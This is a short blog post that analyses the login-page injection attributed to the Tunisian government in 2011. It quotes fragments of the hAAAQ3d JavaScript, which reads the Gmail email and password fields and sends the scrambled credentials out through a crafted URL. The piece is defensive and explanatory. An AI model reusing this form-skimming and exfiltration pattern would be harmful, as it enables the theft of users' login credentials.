It’s only January and we’ve just witnessed a first:  cyber insecurity bringing down a government.  The government of Tunisia, a Wikileak’s target, has been under severe scrutiny for corruption ever since Wikileaks exposed some dodgy practices.

The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation,” where usernames and passwords were harvested, presumably, by the government to monitor and/or manipulate citizen communications.  Facebook, Gmail and Yahoo! were affected.

Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by Tunisian government:

Gmail - http://pastebin.com/G6iEjENK
Yahoo! - http://pastebin.com/M5CbYTWj
Facebook - http://pastebin.com/1JsrcZBf

Sorry, but this entry is about to get quite geeky.   But for those of you who enjoy the anatomy of a hack, this is quite interesting.  If you’re not a geek, basically these are pictures of a hacker’s hand in the cookie jar.

The method is the same in all pages – adding the credential stealing hAAAQ3d() javascript function to the usual form post.

Compare the original Gmail form submission:

With the injected one (note the highlight):

Here's the actual hAAAQ3d script:

 

 
The hAAAQ3d script grabs the username and password:

• The username is stored in the us3r (= user) variable.  var us3r = frm.Email.value;
• The password is stored in the pa55 (= pass) variable.  var pa55 = frm.Passwd.value;

The attack script then sends the credentials (after being scrambled with h6h function) to the nonexistent URL " http://www.google.com/wo0dh3ad" (= woodhead) as parameters:  

var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

Since the Tunisian government controls all internet transactions they could log all transactions to this link, it can easily obtain the credentials.